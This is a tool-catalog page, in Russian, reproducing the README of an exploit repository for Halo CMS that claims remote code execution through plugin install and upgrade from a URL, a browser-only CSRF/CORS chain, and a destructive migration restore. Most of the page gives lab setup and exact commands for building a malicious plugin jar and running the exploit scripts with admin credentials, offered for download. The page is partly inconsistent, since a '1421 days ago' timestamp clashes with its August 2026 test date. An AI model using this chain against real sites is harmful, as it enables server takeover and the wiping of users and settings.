Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
halo-cve-2026-67919 — плагин halo cms: RCE в 1 запрос по URL, PoC + цепочка эксплойтов | Kitploit
Инструменты/GitHubGitHub/k0nnect/halo-cve-2026-67919
ЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubk0nnect/halo-cve-2026-67919

halo-cve-2026-67919

плагин halo cms: RCE в 1 запрос по URL, PoC + цепочка эксплойтов

Репозиторий
1421 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

halo plugin rce из URL

консоль halo позволяет администраторам устанавливать и обновлять плагины, вставляя URL. она загружает любой URL, устанавливает jar, и код из jar выполняется на сервере. никаких проверок схемы, никаких проверок хоста, редиректы отслеживаются, а менеджер плагинов загружает классы расширений прямо из jar.

это cve-2026-67919 (install-from-uri / upgrade-from-uri), cve-2026-67920 (migration restore), cve-2026-67921 (csrf/cors chain). все три проверены против halohub/halo:2.25.4 в docker-лаборатории, август 2026. main до сих пор не пропатчен.

самое интересное: это также цепочка, работающая только через браузер. console api не проверяет xsrf-токен, сессионная cookie имеет samesite=none, а cors отражает любой origin с credentials. страница, которую посещает админ, может сделать всё это с помощью fetch(). смотрите exploit/csrf.html.

лаборатория

root@kitploit:~
docker run -d --name halo -p 8090:8090 halohub/halo:2.25.4
# зайдите на /system/setup один раз, либо автоматизируйте это (см. notes/findings.md)

раздайте jar с хоста (привязка к 0.0.0.0, контейнер обращается к хосту как host.docker.internal):

root@kitploit:~
python3 -m http.server 8123

rce за два запроса

соберите вредоносный плагин (нужен jdk 17):

root@kitploit:~
cd plugin && sh build.sh

затем:

root@kitploit:~
cd exploit && python3 -m pip install -r requirements.txt
./rce_install.py http://localhost:8090 admin 'Admin@12345' \
    http://host.docker.internal:8123/poc-plugin.jar

docker exec halo cat /tmp/pwned

rce за один запрос

любой уже установленный плагин можно заменить одним запросом; jar должен иметь то же metadata.name и более высокую версию. poc-sitemap.jar — это такой вариант для встроенного PluginSitemap (1.x -> 2.0.0).

root@kitploit:~
./rce_upgrade.py http://localhost:8090 admin 'Admin@12345' \
    PluginSitemap http://host.docker.internal:8123/poc-sitemap.jar

docker exec halo cat /tmp/pwned

из браузера, без токена

откройте exploit/csrf.html, укажите ваш halo, нажмите. это цепочка cve-2026-67921 -> cve-2026-67919: без xsrf-заголовка, сессионная cookie уходит cross-site, cors разрешает чтение ответа.

кто может это сделать

только администратор, что бы ни говорило описание cisa. аноним получает 302, гость — 403, администратор — выполнение кода. csrf-цепочка делает это интересным, потому что админ уже залогинен, когда страница выполняется.

migration restore (cve-2026-67920)

восстановления загружают произвольный URL (ещё один fetch-примитив), пишут workdir/ из zip в рабочую директорию halo без санитизации и заменяют всё хранилище расширений содержимым бэкапа. пустой extensions.data удаляет пользователей, привязки ролей и настройки. используйте exploit/migration_restore.py только на одноразовой машине.

что внутри

root@kitploit:~
exploit/   login.py, rce_install.py, rce_upgrade.py,
           migration_restore.py, csrf.html
plugin/    plugin.yaml, Exploit.java, plugin-components.idx,
           build.sh, prebuilt jars
notes/     findings.md (лестница привилегий, поведение fetcher,
           детали cookie/cors, статус исправлений)

для варианта в один запрос отредактируйте plugin/plugin.yaml (metadata.name + version) и пересоберите; либо используйте готовый poc-sitemap.jar против halo, в котором установлен PluginSitemap.

дисклеймер: для исследований на системах, которыми вы владеете. особенно migration — он разрушит инстанс, на котором будет запущен.

авторы

chris jagdeo (k0nnect)

Скачать инструмент